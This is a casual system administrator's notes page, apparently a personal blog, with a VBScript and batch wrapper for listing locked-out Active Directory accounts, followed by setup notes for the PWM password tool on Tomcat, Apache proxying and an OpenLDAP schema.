who is locked out of their active directory 2003+ accounts

oh microsoft, you kidder. you don't have nice attributes set for locked-out accounts. you torture the helpdesk by having people call them. if this is a crazy way to keep the msce crowd employed, you win.

from a command line, run the following:

cscript.exe //nologo findlockedout.vbs >> thosewhoaregoingtocallyourealsoon.txt
 Const ADS_UF_LOCKOUT = 16
 ldapFilter = "(&(sAMAccountType=805306368)(lockoutTime>=1))"
 Set rootDSE = GetObject("LDAP://rootDSE")
 domainDN = rootDSE.Get("defaultNamingContext")
 WScript.Echo "Locked accounts:"
 WScript.Echo
 Set ado = CreateObject("ADODB.Connection")
 ado.Provider = "ADSDSOObject"
 ado.Open "ADSearch"
 Set objectList = ado.Execute("<LDAP://" & domainDN & ">;" & ldapFilter & ";ADSPath,distinguishedName;subtree")
 While Not objectList.EOF
   Set user = GetObject(objectList.Fields("ADSPath"))
   user.GetInfoEx Array("msDS-User-Account-Control-Computed"), 0
   flags = user.Get("msDS-User-Account-Control-Computed")
   if (flags and ADS_UF_LOCKOUT) then
     WScript.Echo objectList.Fields("distinguishedName")
   End if
   objectList.MoveNext
 Wend
from this fine place with ample explanations:
http://www.selfadsi.org/extended-ad/search-locked-users.htm
bonus points:
 @echo on
 echo %date% %time% > crap.txt
 cscript //nologo findlockedout.vbs >> crap.txt
 cls
 setlocal EnableDelayedExpansion
 set "cmd=findstr /R /N "^^" crap.txt | find /C ":""
 for /f %%a in ('!cmd!') do set number=%%a
 echo %number% minus three durr >> crap.txt

pwm installation notes

because i should type it out...
 # apt-get install tomcat7
 # apt-get install default-jdk

 After tomcat is installed:
 /etc/tomcat7 <- configuration
 /var/lib/tomcat7/webapps <- webapps where the war explodes

 Proxy modules are not enabled by default:

 # ln -s /etc/apache2/mods-available/proxy.load /etc/apache2/mods-enabled
 # ln -s /etc/apache2/mods-available/proxy_http.load /etc/apache2/mods-enabled
 # touch /etc/apache2/sites-available/proxyhost

 <VirtualHost *:80>

 ServerName system.name

     DocumentRoot /var/www
     <Directory />
         Options FollowSymLinks
         AllowOverride None
     </Directory>

   ProxyPreserveHost On
   ProxyRequests off
   ProxyPass /pwm http://ip.address:8080/pwm
   ProxyPassReverse /pwm http://ip.address/pwm

 </VirtualHost>

 # /etc/init.d/apache2 restart

pwm & openldap

sigh. rtfm. that's right. read the fine manual, but, be sure to have a highlighter ready. in openldap integration, be sure to create this groovy pwm.schema file:
 # /etc/ldap/schema/pwm.schema
 #
 # We try to define OID's "correctly" as outlined here:
 #
 # http://www.openldap.org/doc/admin23/schema.html
 #
 # 1.3.6.1.4.1  base OID
 # 591242    organization idenfifier
 # 1       if an objectclass
 # 2       if an attribute
 # yyyy.mm.dd  date of creation
 # n       extra identifier
 #
 attributetype ( 1.3.6.1.4.1.591242.2.2010.04.16.1
     NAME 'pwmEventLog'
     SYNTAX 1.3.6.1.4.1.1466.115.121.1.40 )

 attributetype ( 1.3.6.1.4.1.591242.2.2010.04.16.2
     NAME 'pwmResponseSet'
     SYNTAX 1.3.6.1.4.1.1466.115.121.1.40 )

 attributetype ( 1.3.6.1.4.1.591242.2.2010.04.16.3
     NAME 'pwmLastPwdUpdate'
     SYNTAX 1.3.6.1.4.1.1466.115.121.1.24 )

 attributetype ( 1.3.6.1.4.1.591242.2.2010.04.16.4
     NAME 'pwmGUID'
     SYNTAX 1.3.6.1.4.1.1466.115.121.1.15 )

 objectclass ( 1.3.6.1.4.1.591242.1.2010.04.16.1
     NAME 'pwmUser'
     AUXILIARY
     MAY ( pwmLastPwdUpdate $ pwmEventLog $ pwmResponseSet $
     pwmGUID ) )
in the admin manual, that last ) is missing.

remember, those schema aren't loaded automagically... in your slapd.conf file, add this line:
include /etc/ldap/schema/pwm.schema
